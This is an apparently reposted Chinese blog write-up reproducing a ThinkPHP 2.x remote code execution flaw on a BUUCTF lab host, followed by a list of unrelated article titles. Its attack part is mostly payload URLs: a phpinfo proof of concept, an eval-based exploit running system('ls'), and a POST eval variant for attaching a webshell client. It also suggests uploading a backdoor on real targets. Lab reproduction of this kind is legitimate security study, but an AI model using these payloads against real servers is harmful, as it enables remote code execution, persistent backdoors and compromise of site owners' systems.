[ThinkPHP]2-Rce 复现
本文共 392 字,大约阅读时间需要 1 分钟。
[ThinkPHP]2-Rce 复现
环境搭建
POC
老懒狗选择buu
http://node3.buuoj.cn:26104/
http://node3.buuoj.cn:26104?s=/index/index/name/$%7B@phpinfo()%7D
exp
我试了一下直接用system调用命令好像不行,可能因为中间掺杂了一些符号,这边利用eval函数进行绕过。
http://node3.buuoj.cn:26104/?s=/index/index/name/${@eval($_GET[1])}&1=system(%27ls%27); 或者构造payload用蚁剑连接
http://node3.buuoj.cn:26104/?s=/index/index/name/${@eval($_POST[1])} 
权限应该差不多了,真实环境的话可以考虑传一个后门~ 转载地址:http://eapbi.baihongyu.com/
你可能感兴趣的文章
Android计算器实现源码分析
查看>>
Android系统构架
查看>>
Android 跨应用程序访问窗口知识点总结
查看>>
各种排序算法的分析及java实现
查看>>
SSH框架总结(框架分析+环境搭建+实例源码下载)
查看>>
js弹窗插件
查看>>
自定义 select 下拉框 多选插件
查看>>
js判断数组内是否有重复值
查看>>
js获取url链接携带的参数值
查看>>
gdb 调试core dump
查看>>
gdb debug tips
查看>>
arm linux 生成火焰图
查看>>
jtag dump内存数据
查看>>
linux和windows内存布局验证
查看>>
linux config
查看>>
linux insmod error -1 required key invalid
查看>>
linux kconfig配置
查看>>
linux不同模块completion通信
查看>>
linux printf获得时间戳
查看>>
C语言位扩展
查看>>